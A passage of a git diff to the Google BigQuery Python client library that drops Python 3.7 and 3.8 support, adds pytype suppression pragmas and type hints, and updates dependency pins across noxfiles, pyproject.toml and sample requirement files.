+ _ARROW_SCALAR_IDS_TO_BQ[pyarrow.decimal256(76, scale=38).id] = "BIGNUMERIC" def bq_to_arrow_scalars(bq_scalar: str): diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 73c4acabf..6e943adf3 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -835,8 +835,10 @@ def schema(self): See https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.schema """ - prop = self._properties.get("schema", {}) - return [SchemaField.from_api_repr(field) for field in prop.get("fields", [])] + # TODO: The typehinting for this needs work. Setting this pragma to temporarily + # manage a pytype issue that came up in another PR. See Issue: #2132 + prop = self._properties.get("schema", {}) # type: ignore + return [SchemaField.from_api_repr(field) for field in prop.get("fields", [])] # type: ignore @schema.setter def schema(self, value): diff --git a/google/cloud/bigquery/format_options.py b/google/cloud/bigquery/format_options.py index ad5591b1c..e26b7a74f 100644 --- a/google/cloud/bigquery/format_options.py +++ b/google/cloud/bigquery/format_options.py @@ -13,7 +13,7 @@ # limitations under the License. 
import copy -from typing import Dict, Optional +from typing import Dict, Optional, Union class AvroOptions: @@ -106,7 +106,7 @@ def enable_list_inference(self, value: bool) -> None: self._properties["enableListInference"] = value @property - def map_target_type(self) -> str: + def map_target_type(self) -> Optional[Union[bool, str]]: """Indicates whether to simplify the representation of parquet maps to only show keys and values.""" return self._properties.get("mapTargetType") diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index e5f68c843..eaa9d3460 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -415,7 +415,9 @@ def __init__(self, job_id, client): @property def configuration(self) -> _JobConfig: """Job-type specific configurtion.""" - configuration = self._CONFIG_CLASS() + # TODO: The typehinting for this needs work. Setting this pragma to temporarily + # manage a pytype issue that came up in another PR. See Issue: #2132 + configuration = self._CONFIG_CLASS() # pytype: disable=not-callable configuration._properties = self._properties.setdefault("configuration", {}) return configuration diff --git a/google/cloud/bigquery/magics/magics.py b/google/cloud/bigquery/magics/magics.py index a5be95185..1f892b595 100644 --- a/google/cloud/bigquery/magics/magics.py +++ b/google/cloud/bigquery/magics/magics.py @@ -55,7 +55,6 @@ except ImportError: bigquery_magics = None - IPYTHON_USER_AGENT = "ipython-{}".format(IPython.__version__) # type: ignore diff --git a/google/cloud/bigquery/model.py b/google/cloud/bigquery/model.py index 45a88ab22..16581be5a 100644 --- a/google/cloud/bigquery/model.py +++ b/google/cloud/bigquery/model.py @@ -58,7 +58,7 @@ def __init__(self, model_ref: Union["ModelReference", str, None]): # semantics. The BigQuery API makes a distinction between an unset # value, a null value, and a default value (0 or ""), but the protocol # buffer classes do not. 
- self._properties = {} + self._properties: Dict[str, Any] = {} if isinstance(model_ref, str): model_ref = ModelReference.from_string(model_ref) diff --git a/google/cloud/bigquery/routine/routine.py b/google/cloud/bigquery/routine/routine.py index 83cb6362d..7e079781d 100644 --- a/google/cloud/bigquery/routine/routine.py +++ b/google/cloud/bigquery/routine/routine.py @@ -16,7 +16,7 @@ """Define resources for the BigQuery Routines API.""" -from typing import Any, Dict, Optional +from typing import Any, Dict, Optional, Union import google.cloud._helpers # type: ignore from google.cloud.bigquery import _helpers @@ -216,7 +216,7 @@ def return_type(self, value: StandardSqlDataType): self._properties[self._PROPERTY_TO_API_FIELD["return_type"]] = resource @property - def return_table_type(self) -> Optional[StandardSqlTableType]: + def return_table_type(self) -> Union[StandardSqlTableType, Any, None]: """The return type of a Table Valued Function (TVF) routine. .. versionadded:: 2.22.0 @@ -518,17 +518,23 @@ def __init__(self): @property def project(self): """str: ID of the project containing the routine.""" - return self._properties["projectId"] # pytype: disable=key-error + # TODO: The typehinting for this needs work. Setting this pragma to temporarily + # manage a pytype issue that came up in another PR. See Issue: #2132 + return self._properties["projectId"] # pytype: disable=typed-dict-error @property def dataset_id(self): """str: ID of dataset containing the routine.""" - return self._properties["datasetId"] # pytype: disable=key-error + # TODO: The typehinting for this needs work. Setting this pragma to temporarily + # manage a pytype issue that came up in another PR. See Issue: #2132 + return self._properties["datasetId"] # pytype: disable=typed-dict-error @property def routine_id(self): """str: The routine ID.""" - return self._properties["routineId"] # pytype: disable=key-error + # TODO: The typehinting for this needs work. 
Setting this pragma to temporarily + # manage a pytype issue that came up in another PR. See Issue: #2132 + return self._properties["routineId"] # pytype: disable=typed-dict-error @property def path(self): diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 03cde830e..749b0a00e 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -232,8 +232,12 @@ def __init__( if max_length is not _DEFAULT_VALUE: self._properties["maxLength"] = max_length if policy_tags is not _DEFAULT_VALUE: + # TODO: The typehinting for this needs work. Setting this pragma to temporarily + # manage a pytype issue that came up in another PR. See Issue: #2132 self._properties["policyTags"] = ( - policy_tags.to_api_repr() if policy_tags is not None else None + policy_tags.to_api_repr() # pytype: disable=attribute-error + if policy_tags is not None + else None ) if isinstance(range_element_type, str): self._properties["rangeElementType"] = {"type": range_element_type} diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index c70a0ebea..e7f3c9a36 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -137,6 +137,8 @@ def _reference_getter(table): return TableReference(dataset_ref, table.table_id) +# TODO: The typehinting for this needs work. Setting this pragma to temporarily +# manage a pytype issue that came up in another PR. See Issue: #2132 def _view_use_legacy_sql_getter(table): """bool: Specifies whether to execute the view with Legacy or Standard SQL. @@ -148,10 +150,11 @@ def _view_use_legacy_sql_getter(table): Raises: ValueError: For invalid value types. """ - view = table._properties.get("view") + + view = table._properties.get("view") # type: ignore if view is not None: # The server-side default for useLegacySql is True. 
- return view.get("useLegacySql", True) + return view.get("useLegacySql", True) # type: ignore # In some cases, such as in a table list no view object is present, but the # resource still represents a view. Use the type as a fallback. if table.table_type == "VIEW": @@ -375,7 +378,7 @@ class Table(_TableBase): :meth:`~google.cloud.bigquery.schema.SchemaField.from_api_repr`. """ - _PROPERTY_TO_API_FIELD = { + _PROPERTY_TO_API_FIELD: Dict[str, Any] = { **_TableBase._PROPERTY_TO_API_FIELD, "clustering_fields": "clustering", "created": "creationTime", @@ -418,7 +421,10 @@ class Table(_TableBase): def __init__(self, table_ref, schema=None) -> None: table_ref = _table_arg_to_table_ref(table_ref) - self._properties = {"tableReference": table_ref.to_api_repr(), "labels": {}} + self._properties: Dict[str, Any] = { + "tableReference": table_ref.to_api_repr(), + "labels": {}, + } # Let the @property do validation. if schema is not None: self.schema = schema diff --git a/noxfile.py b/noxfile.py index 87bd9a70c..f069f8d37 100644 --- a/noxfile.py +++ b/noxfile.py @@ -24,7 +24,7 @@ MYPY_VERSION = "mypy==1.6.1" -PYTYPE_VERSION = "pytype==2021.4.9" +PYTYPE_VERSION = "pytype==2024.9.13" BLACK_VERSION = "black==23.7.0" BLACK_PATHS = ( "benchmark", @@ -37,9 +37,9 @@ "setup.py", ) -DEFAULT_PYTHON_VERSION = "3.8" -SYSTEM_TEST_PYTHON_VERSIONS = ["3.8", "3.11", "3.12"] -UNIT_TEST_PYTHON_VERSIONS = ["3.7", "3.8", "3.12"] +DEFAULT_PYTHON_VERSION = "3.9" +SYSTEM_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12"] +UNIT_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12"] CURRENT_DIRECTORY = pathlib.Path(__file__).parent.absolute() @@ -102,10 +102,16 @@ def default(session, install_extras=True): "-c", constraints_path, ) - - if install_extras and session.python in ["3.11", "3.12"]: - install_target = ".[bqstorage,ipywidgets,pandas,tqdm,opentelemetry]" - elif install_extras: + # We have logic in the magics.py file that checks for whether 'bigquery_magics' + # is imported OR not. 
If yes, we use a context object from that library. + # If no, we use our own context object from magics.py. In order to exercise + # that logic (and the associated tests) we avoid installing the [ipython] extra + # which has a downstream effect of then avoiding installing bigquery_magics. + if install_extras and session.python == UNIT_TEST_PYTHON_VERSIONS[0]: + install_target = ( + ".[bqstorage,pandas,ipywidgets,geopandas,tqdm,opentelemetry,bigquery_v2]" + ) + elif install_extras: # run against all other UNIT_TEST_PYTHON_VERSIONS install_target = ".[all]" else: install_target = "." @@ -157,7 +163,7 @@ def unit_noextras(session): # so that it continues to be an optional dependency. # https://github.com/googleapis/python-bigquery/issues/1877 if session.python == UNIT_TEST_PYTHON_VERSIONS[0]: - session.install("pyarrow==1.0.0") + session.install("pyarrow==4.0.0") default(session, install_extras=False) @@ -178,6 +184,7 @@ def mypy(session): "types-requests", "types-setuptools", ) + session.run("python", "-m", "pip", "freeze") session.run("mypy", "-p", "google", "--show-traceback") @@ -192,6 +199,7 @@ def pytype(session): session.install("attrs==20.3.0") session.install("-e", ".[all]") session.install(PYTYPE_VERSION) + session.run("python", "-m", "pip", "freeze") # See https://github.com/google/pytype/issues/464 session.run("pytype", "-P", ".", "google/cloud/bigquery") @@ -281,7 +289,7 @@ def mypy_samples(session): "types-setuptools", ) - session.install("typing-extensions") # for TypedDict in pre-3.8 Python versions + session.run("python", "-m", "pip", "freeze") session.run( "mypy", @@ -307,10 +315,13 @@ def snippets(session): session.install("grpcio", "-c", constraints_path) if session.python in ["3.11", "3.12"]: - extras = "[bqstorage,ipywidgets,pandas,tqdm,opentelemetry]" + extras = ( + "[bqstorage,pandas,ipywidgets,geopandas,tqdm,opentelemetry,bigquery_v2]" + ) else: extras = "[all]" session.install("-e", f".{extras}", "-c", constraints_path) + 
session.run("python", "-m", "pip", "freeze") # Run py.test against the snippets tests. # Skip tests in samples/snippets, as those are run in a different session @@ -339,6 +350,7 @@ def cover(session): """ session.install("coverage", "pytest-cov") + session.run("python", "-m", "pip", "freeze") session.run("coverage", "report", "--show-missing", "--fail-under=100") session.run("coverage", "erase") @@ -378,6 +390,7 @@ def prerelease_deps(session): "google-cloud-bigquery-storage", "google-cloud-core", "google-resumable-media", + "db-dtypes", # Exclude version 1.49.0rc1 which has a known issue. See https://github.com/grpc/grpc/pull/30642 "grpcio!=1.49.0rc1", ) @@ -417,9 +430,6 @@ def prerelease_deps(session): session.install("--no-deps", "-e", ".[all]") # Print out prerelease package versions. - session.run("python", "-c", "import grpc; print(grpc.__version__)") - session.run("python", "-c", "import pandas; print(pandas.__version__)") - session.run("python", "-c", "import pyarrow; print(pyarrow.__version__)") session.run("python", "-m", "pip", "freeze") # Run all tests, except a few samples tests which require extra dependencies. 
@@ -453,6 +463,7 @@ def lint(session): session.install("flake8", BLACK_VERSION) session.install("-e", ".") + session.run("python", "-m", "pip", "freeze") session.run("flake8", os.path.join("google", "cloud", "bigquery")) session.run("flake8", "tests") session.run("flake8", os.path.join("docs", "samples")) @@ -467,6 +478,7 @@ def lint_setup_py(session): """Verify that setup.py is valid (including RST check).""" session.install("docutils", "Pygments") + session.run("python", "-m", "pip", "freeze") session.run("python", "setup.py", "check", "--restructuredtext", "--strict") @@ -478,6 +490,7 @@ def blacken(session): """ session.install(BLACK_VERSION) + session.run("python", "-m", "pip", "freeze") session.run("black", *BLACK_PATHS) @@ -504,6 +517,7 @@ def docs(session): session.install("-e", ".[all]") shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True) + session.run("python", "-m", "pip", "freeze") session.run( "sphinx-build", "-W", # warnings as errors @@ -540,6 +554,7 @@ def docfx(session): ) shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True) + session.run("python", "-m", "pip", "freeze") session.run( "sphinx-build", "-T", # show full traceback on exception diff --git a/owlbot.py b/owlbot.py index 07805d11a..c8efaa98d 100644 --- a/owlbot.py +++ b/owlbot.py @@ -14,7 +14,6 @@ """This script is used to synthesize generated parts of this library.""" from pathlib import Path -import textwrap import synthtool as s from synthtool import gcp @@ -70,13 +69,65 @@ # Include custom SNIPPETS_TESTS job for performance. 
# https://github.com/googleapis/python-bigquery/issues/191 ".kokoro/presubmit/presubmit.cfg", + ".kokoro/presubmit/system-3.8.cfg", ".kokoro/continuous/prerelease-deps.cfg", + ".kokoro/samples/python3.7/**", + ".kokoro/samples/python3.8/**", ".github/workflows", # exclude gh actions as credentials are needed for tests - "README.rst", + "README.rst", ], ) python.configure_previous_major_version_branches() + +s.replace( + ".kokoro/test-samples-impl.sh", + """# `virtualenv==20.26.6` is added for Python 3.7 compatibility +python3.9 -m pip install --upgrade --quiet nox virtualenv==20.26.6""", + "python3.9 -m pip install --upgrade --quiet nox virtualenv", +) +s.replace( + "CONTRIBUTING.rst", + "3.7, 3.8, 3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows.", + "3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows.", +) +s.replace( + "CONTRIBUTING.rst", + r" \$ nox -s system-3.8 -- -k ", + r" $ nox -s system-3.9 -- -k ", +) +s.replace( + "CONTRIBUTING.rst", + r"""System tests are only configured to run under Python 3.8. + For expediency, we do not run them in older versions of Python 3.""", + r"System tests are configured to run under Python 3.9, 3.11, 3.12.", +) +s.replace( + "CONTRIBUTING.rst", + r"\$ nox -s py-3.8", + r"$ nox -s py-3.9", +) +s.replace( + "CONTRIBUTING.rst", + r"""- `Python 3.7`_ +- `Python 3.8`_ +""", + r"", +) +s.replace( + "CONTRIBUTING.rst", + r""".. _Python 3.7: https://docs.python.org/3.7/ +.. 
_Python 3.8: https://docs.python.org/3.8/ +""", + r"", +) +s.replace( + "scripts/readme-gen/templates/install_deps.tmpl.rst", + r"Samples are compatible with Python 3.7", + r"Samples are compatible with Python 3.9", +) + + # ---------------------------------------------------------------------------- # Samples templates # ---------------------------------------------------------------------------- @@ -93,6 +144,17 @@ r"exclude_patterns = \[", '\\g<0>\n "google/cloud/bigquery_v2/**", # Legacy proto-based types.', ) +s.replace( + "samples/**/noxfile.py", + 'BLACK_VERSION = "black==22.3.0"', + 'BLACK_VERSION = "black==23.7.0"', +) +s.replace( + "samples/**/noxfile.py", + r'ALL_VERSIONS = \["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"\]', + 'ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"]', +) + # ---------------------------------------------------------------------------- # pytype-related changes diff --git a/pyproject.toml b/pyproject.toml index c4e5c2f0d..8822fc57d 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -20,7 +20,7 @@ build-backend = "setuptools.build_meta" name = "google-cloud-bigquery" authors = [{ name = "Google LLC", email = "googleapis-packages@google.com" }] license = { text = "Apache 2.0" } -requires-python = ">=3.7" +requires-python = ">=3.9" description = "Google BigQuery API client library" readme = "README.rst" classifiers = [ @@ -33,8 +33,6 @@ classifiers = [ "License :: OSI Approved :: Apache Software License", "Programming Language :: Python", "Programming Language :: Python :: 3", - "Programming Language :: Python :: 3.7", - "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", @@ -47,8 +45,8 @@ dependencies = [ "google-auth >= 2.14.1, < 3.0.0dev", "google-cloud-core >= 2.4.1, < 3.0.0dev", "google-resumable-media >= 2.0.0, < 3.0dev", - "packaging >= 20.0.0", - "python-dateutil >= 2.7.3, < 3.0dev", + "packaging >= 
24.2.0", + "python-dateutil >= 2.8.2, < 3.0dev", "requests >= 2.21.0, < 3.0.0dev", ] dynamic = ["version"] @@ -61,7 +59,7 @@ Repository = "https://github.com/googleapis/python-bigquery" # moved back to optional due to bloat. See # https://github.com/googleapis/python-bigquery/issues/1196 for more background. bqstorage = [ - "google-cloud-bigquery-storage >= 2.6.0, < 3.0.0dev", + "google-cloud-bigquery-storage >= 2.18.0, < 3.0.0dev", # Due to an issue in pip's dependency resolver, the `grpc` extra is not # installed, even though `google-cloud-bigquery-storage` specifies it # as `google-api-core[grpc]`. We thus need to explicitly specify it here. @@ -70,20 +68,19 @@ bqstorage = [ # https://github.com/grpc/grpc/pull/15254 "grpcio >= 1.47.0, < 2.0dev", "grpcio >= 1.49.1, < 2.0dev; python_version >= '3.11'", - "pyarrow >= 3.0.0", + "pyarrow >= 4.0.0", ] pandas = [ - "pandas >= 1.1.0", + "pandas >= 1.1.4", "pandas-gbq >= 0.26.1; python_version >= '3.8'", "grpcio >= 1.47.0, < 2.0dev", "grpcio >= 1.49.1, < 2.0dev; python_version >= '3.11'", "pyarrow >= 3.0.0", - "db-dtypes >= 0.3.0, < 2.0.0dev", - "importlib_metadata >= 1.0.0; python_version < '3.8'", + "db-dtypes >= 1.0.4, < 2.0.0dev", ] -ipywidgets = ["ipywidgets >= 7.7.0", "ipykernel >= 6.0.0"] +ipywidgets = ["ipywidgets >= 7.7.1", "ipykernel >= 6.2.0"] geopandas = ["geopandas >= 0.9.0, < 2.0dev", "Shapely >= 1.8.4, < 3.0.0dev"] -ipython = ["bigquery-magics >= 0.1.0"] +ipython = ["ipython >= 7.23.1", "bigquery-magics >= 0.6.0"] tqdm = ["tqdm >= 4.7.4, < 5.0.0dev"] opentelemetry = [ "opentelemetry-api >= 1.1.0", diff --git a/samples/desktopapp/noxfile.py b/samples/desktopapp/noxfile.py index c9a3d1ecb..a86590382 100644 --- a/samples/desktopapp/noxfile.py +++ b/samples/desktopapp/noxfile.py @@ -29,7 +29,7 @@ # WARNING - WARNING - WARNING - WARNING - WARNING # WARNING - WARNING - WARNING - WARNING - WARNING -BLACK_VERSION = "black==22.3.0" +BLACK_VERSION = "black==23.7.0" ISORT_VERSION = "isort==5.10.1" # Copy 
`noxfile_config.py` to your directory and modify it instead. @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 827b02dcf..cf215e2fd 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,3 @@ google-cloud-testutils==1.5.0 -pytest===7.4.4; python_version == '3.7' -pytest==8.3.4; python_version >= '3.8' +pytest==8.3.4 mock==5.1.0 diff --git a/samples/desktopapp/user_credentials_test.py b/samples/desktopapp/user_credentials_test.py index 252b843c4..d14798d9b 100644 --- a/samples/desktopapp/user_credentials_test.py +++ b/samples/desktopapp/user_credentials_test.py @@ -13,7 +13,6 @@ # limitations under the License. 
import os -import sys from typing import Iterator, Union from unittest import mock @@ -24,13 +23,7 @@ PROJECT = os.environ["GOOGLE_CLOUD_PROJECT"] - -if sys.version_info >= (3, 8): - # Python 3.8+ has an AsyncMock attribute in unittest.mock, but 3.7 does not - MockType = Union[mock.MagicMock, mock.AsyncMock] -else: - # Other definitions and imports - MockType = Union[mock.MagicMock] +MockType = Union[mock.MagicMock, mock.AsyncMock] @pytest.fixture diff --git a/samples/geography/noxfile.py b/samples/geography/noxfile.py index c9a3d1ecb..a86590382 100644 --- a/samples/geography/noxfile.py +++ b/samples/geography/noxfile.py @@ -29,7 +29,7 @@ # WARNING - WARNING - WARNING - WARNING - WARNING # WARNING - WARNING - WARNING - WARNING - WARNING -BLACK_VERSION = "black==22.3.0" +BLACK_VERSION = "black==23.7.0" ISORT_VERSION = "isort==5.10.1" # Copy `noxfile_config.py` to your directory and modify it instead. @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. 
IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index ef38acb4f..4ad1bd028 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,2 @@ -pytest===7.4.4; python_version == '3.7' -pytest==8.3.4; python_version >= '3.8' +pytest==8.3.4 mock==5.1.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 71579867f..0ad2154a4 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,63 +1,41 @@ -attrs===24.2.0; python_version == '3.7' -attrs==24.3.0; python_version >= '3.8' +attrs==24.3.0 certifi==2024.12.14 -cffi===1.15.1; python_version == '3.7' -cffi==1.17.1; python_version >= '3.8' +cffi==1.17.1 charset-normalizer==3.4.1 click==8.1.8 click-plugins==1.1.1 cligj==0.7.2 -dataclasses==0.8; python_version < '3.7' db-dtypes==1.3.1 -Fiona===1.9.6; python_version == '3.7' -Fiona==1.10.1; python_version >= '3.8' +Fiona==1.10.1 geojson==3.2.0 -geopandas===0.10.2; python_version == '3.7' -geopandas===0.13.2; python_version == '3.8' -geopandas==1.0.1; python_version >= '3.9' +geopandas==1.0.1 google-api-core==2.24.0 google-auth==2.37.0 google-cloud-bigquery==3.27.0 google-cloud-bigquery-storage==2.27.0 google-cloud-core==2.4.1 -google-crc32c===1.5.0; python_version < '3.9' -google-crc32c==1.6.0; python_version >= '3.9' +google-crc32c==1.6.0 google-resumable-media==2.7.2 googleapis-common-protos==1.66.0 -grpcio===1.62.2; python_version == '3.7' -grpcio==1.69.0; python_version >= '3.8' +grpcio==1.69.0 idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 -packaging===24.0; python_version == '3.7' -packaging==24.2; python_version >= '3.8' -pandas===1.3.5; python_version == '3.7' -pandas===2.0.3; python_version == '3.8' -pandas==2.2.3; python_version >= '3.9' +packaging==24.2 +pandas==2.2.3 proto-plus==1.25.0 -pyarrow===12.0.1; python_version == '3.7' -pyarrow===17.0.0; 
python_version == '3.8' -pyarrow==18.1.0; python_version >= '3.9' -pyasn1===0.5.1; python_version == '3.7' -pyasn1==0.6.1; python_version >= '3.8' -pyasn1-modules===0.3.0; python_version == '3.7' -pyasn1-modules==0.4.1; python_version >= '3.8' -pycparser===2.21; python_version == '3.7' -pycparser==2.22; python_version >= '3.8' -pyparsing===3.1.4; python_version < '3.9' -pyparsing==3.2.1; python_version >= '3.9' +pyarrow==18.1.0 +pyasn1==0.6.1 +pyasn1-modules==0.4.1 +pycparser==2.22 +pyparsing==3.2.1 python-dateutil==2.9.0.post0 pytz==2024.2 -PyYAML===6.0.1; python_version == '3.7' -PyYAML==6.0.2; python_version >= '3.8' -requests==2.31.0; python_version == '3.7' -requests==2.32.3; python_version >= '3.8' +PyYAML==6.0.2 +requests==2.32.3 rsa==4.9 Shapely==2.0.6 six==1.17.0 -typing-extensions===4.7.1; python_version == '3.7' -typing-extensions==4.12.2; python_version >= '3.8' +typing-extensions==4.12.2 typing-inspect==0.9.0 -urllib3===1.26.18; python_version == '3.7' -urllib3===2.2.3; python_version == '3.8' -urllib3==2.3.0; python_version >= '3.9' +urllib3==2.3.0 diff --git a/samples/magics/conftest.py b/samples/magics/conftest.py index 55ea30f90..0943c535a 100644 --- a/samples/magics/conftest.py +++ b/samples/magics/conftest.py @@ -18,7 +18,7 @@ import pytest if typing.TYPE_CHECKING: - from IPython.core.interactiveshell import TerminalInteractiveShell + from IPython.terminal.interactiveshell import TerminalInteractiveShell interactiveshell = pytest.importorskip("IPython.terminal.interactiveshell") tools = pytest.importorskip("IPython.testing.tools") @@ -40,5 +40,7 @@ def ipython_interactive( for the duration of the test scope. 
""" - with ipython.builtin_trap: + + trap = typing.cast(typing.ContextManager, ipython.builtin_trap) + with trap: yield ipython diff --git a/samples/magics/noxfile.py b/samples/magics/noxfile.py index c9a3d1ecb..a86590382 100644 --- a/samples/magics/noxfile.py +++ b/samples/magics/noxfile.py @@ -29,7 +29,7 @@ # WARNING - WARNING - WARNING - WARNING - WARNING # WARNING - WARNING - WARNING - WARNING - WARNING -BLACK_VERSION = "black==22.3.0" +BLACK_VERSION = "black==23.7.0" ISORT_VERSION = "isort==5.10.1" # Copy `noxfile_config.py` to your directory and modify it instead. @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 827b02dcf..cf215e2fd 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,3 @@ google-cloud-testutils==1.5.0 -pytest===7.4.4; python_version == '3.7' -pytest==8.3.4; python_version >= '3.8' +pytest==8.3.4 mock==5.1.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 87efa3dec..4b81fe0ad 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -2,9 +2,5 @@ bigquery_magics==0.5.0 db-dtypes==1.3.1 google.cloud.bigquery==3.27.0 google-cloud-bigquery-storage==2.27.0 -ipython===7.31.1; python_version == '3.7' -ipython===8.0.1; python_version == '3.8' -ipython===8.18.1; python_version >= '3.9' -pandas===1.3.5; python_version == '3.7' -pandas===2.0.3; python_version == '3.8' -pandas==2.2.3; python_version >= '3.9' +ipython===8.18.1 +pandas==2.2.3 diff --git a/samples/notebooks/jupyter_tutorial_test.py 
b/samples/notebooks/jupyter_tutorial_test.py index 2c2cf9390..1861a822f 100644 --- a/samples/notebooks/jupyter_tutorial_test.py +++ b/samples/notebooks/jupyter_tutorial_test.py @@ -45,7 +45,9 @@ def ipython_interactive( for the duration of the test scope. """ - with ipython.builtin_trap: + + trap = typing.cast(typing.ContextManager, ipython.builtin_trap) + with trap: yield ipython diff --git a/samples/notebooks/noxfile.py b/samples/notebooks/noxfile.py index c9a3d1ecb..a86590382 100644 --- a/samples/notebooks/noxfile.py +++ b/samples/notebooks/noxfile.py @@ -29,7 +29,7 @@ # WARNING - WARNING - WARNING - WARNING - WARNING # WARNING - WARNING - WARNING - WARNING - WARNING -BLACK_VERSION = "black==22.3.0" +BLACK_VERSION = "black==23.7.0" ISORT_VERSION = "isort==5.10.1" # Copy `noxfile_config.py` to your directory and modify it instead. @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. 
IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 827b02dcf..cf215e2fd 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,3 @@ google-cloud-testutils==1.5.0 -pytest===7.4.4; python_version == '3.7' -pytest==8.3.4; python_version >= '3.8' +pytest==8.3.4 mock==5.1.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 77103a338..e92d084a4 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -2,13 +2,7 @@ bigquery-magics==0.5.0 db-dtypes==1.3.1 google-cloud-bigquery==3.27.0 google-cloud-bigquery-storage==2.27.0 -ipython===7.31.1; python_version == '3.7' -ipython===8.0.1; python_version == '3.8' -ipython===8.18.1; python_version >= '3.9' -matplotlib===3.5.3; python_version == '3.7' -matplotlib===3.7.4; python_version == '3.8' +ipython==8.18.1 matplotlib===3.9.2; python_version == '3.9' matplotlib==3.10.0; python_version >= '3.10' -pandas===1.3.5; python_version == '3.7' -pandas===2.0.3; python_version == '3.8' -pandas==2.2.3; python_version >= '3.9' +pandas==2.2.3 diff --git a/samples/snippets/noxfile.py b/samples/snippets/noxfile.py index c9a3d1ecb..a86590382 100644 --- a/samples/snippets/noxfile.py +++ b/samples/snippets/noxfile.py @@ -29,7 +29,7 @@ # WARNING - WARNING - WARNING - WARNING - WARNING # WARNING - WARNING - WARNING - WARNING - WARNING -BLACK_VERSION = "black==22.3.0" +BLACK_VERSION = "black==23.7.0" ISORT_VERSION = "isort==5.10.1" # Copy `noxfile_config.py` to your directory and modify it instead. @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] +ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. 
